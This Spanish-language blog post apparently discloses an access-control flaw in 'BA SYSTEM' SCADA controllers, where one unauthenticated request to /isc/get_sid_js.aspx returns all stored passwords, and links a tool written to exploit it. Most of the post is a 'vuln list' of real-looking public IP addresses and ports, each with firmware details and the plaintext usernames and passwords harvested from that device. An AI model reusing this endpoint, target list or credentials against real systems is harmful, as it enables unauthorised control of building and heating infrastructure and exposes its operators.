viernes, 29 de diciembre de 2017

BA SYSTEM; “Improper Access Control (Authorization)”.

SCADAS de la firma “BA SYSTEM”:




Accedemos a la plataforma:




Al intentar cualquier manipulación contra los disitintos settings de la plataforma, esta nos solicitará las credenciales (solo un password ).

Es totalmente valido  bruteforcear el campo, auque una alternativa mas eficiente y sencilla sera llamar al recurso: “/isc/get_sid_js.aspx”, de esta manera obtenemos un json con todas las credenciales habilitadas.



Me incline por codear una sencilla tool que a falta de originalidad le puse "cafeina":
https://github.com/ezelf/baCK_system




Adentro y sin restricciones:




y por supuesto como administradores (luego de ingresar las credenciales correspondientes) se podran ver/listar el total de los usuarios habilitados, setear niveles de accesos, cambiar las credenciales, etc.




Scadas "BA_SYSTEM" ONTHE WILD:

Segun distintos criterios de busqueda



***




***

vuln list:


 [+] GET:    http://87.72.90.237:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002

 [+] GET:      http://212.62.63.16:9000/isc/get_sid_js.aspx
 [+] Server:    BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0040  
 [+] Script: 02.65.06  
 +-----+------------------+------------------+---------------+---------------------------+
 | Sid | Username      | Password | Email | SMS |
 +-----+------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   7 | sif | grejanje2015
 +-----+------------------+------------------+---------------+---------------------------+

 [+] GET:      http://212.62.63.34:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0040  
 [+] Script: 02.66.01  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   7 | sif | grejanje2015
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:      http://212.62.63.36:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0040  
 [+] Script: 02.65.06  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   7 | sif | grejanje2015
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:    http://212.62.63.38:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0040  
 [+] Script: 02.65.06  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   7 | sif | grejanje2015
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:      http://212.62.63.43:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0044  
 [+] Script: 02.66.02  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   5 | sif | grejanje2015
 +-----+------------------------+------------------+---------------+---------------------------+


 [+] GET:      http://212.62.63.45:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0044  
 [+] Script: 02.66.02  
 +-----+------------------+------------------+---------------+---------------------------+
 | Sid | Username      | Password | Email | SMS |
 +-----+------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   7 | sif | grejanje2015
 +-----+------------------+------------------+---------------+---------------------------+


 [+] GET:      http://212.62.63.46:9000/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0040  
 [+] Script: 02.65.06  
 +-----+------------------+------------------+---------------+---------------------------+
 | Sid | Username      | Password | Email | SMS |
 +-----+------------------+------------------+---------------+---------------------------+
 |   5 | admin | 1992
 |   5 | sif | grejanje2015
 +-----+------------------+------------------+---------------+---------------------------+

 [+] GET:      http://212.62.63.48:9000/isc/get_sid_js.aspx
 [+] Server:    BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0048  
 [+] Script: 02.68.01  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   7 | admin | 1992
 |   5 | sif | grejanje2015
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:     http://80.251.207.101:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username         | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   6 | Kirke_Tjener | grundtvig
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:      http://80.251.207.101:81/isc/get_sid_js.aspx
 [+] Server:    BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0050  
 [+] Script: 02.68.01  
 +-----+------------------------+------------------+---------------+---------------------------+
 | Sid | Username             | Password | Email | SMS |
 +-----+------------------------+------------------+---------------+---------------------------+
 |   6 | Kirke_Tjener | grundtvig
 +-----+------------------------+------------------+---------------+---------------------------+

 [+] GET:      http://77.75.164.24:80/isc/get_sid_js.aspx
 [+] Server:    BAS920 HTTPserv:00002
 [+] Firmware: 01.01.0048  
 [+] Script: 02.68.01  

 [+] GET:     http://87.63.77.90:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002

 [+] GET:     http://79.142.225.202:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002


 [+] GET:     http://83.221.156.153:9002/isc/get_sid_js.aspx
 [+] Server:  BAS9XXS HTTPserv:00002
 +-----+------------------+------------------+---------------+---------------------------+
 | Sid | Username      | Password | Email | SMS |
 +-----+------------------+------------------+---------------+---------------------------+
 |   1 | 1 | 1111
 |   2 | 2 | 2222
 |   3 | 3 | 3333
 |   4 | 4 | 4444
 |   7 | Supervisor | 5555
 +-----+------------------+------------------+---------------+---------------------------+


 [+] GET:     http://80.199.46.82:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002


 [+] GET:     http://83.89.164.210:80/isc/get_sid_js.aspx
 [+] Server:  BAS920 HTTPserv:00002

 +-----+------------------+------------------+---------------+---------------------------+
 | Sid | Username      | Password | Email | SMS |
 +-----+------------------+------------------+---------------+---------------------------+
 |   1 | ensys | ensys
 |   7 | clorius | 1
 +-----+------------------+------------------+---------------+---------------------------+


No hay comentarios.:

Publicar un comentario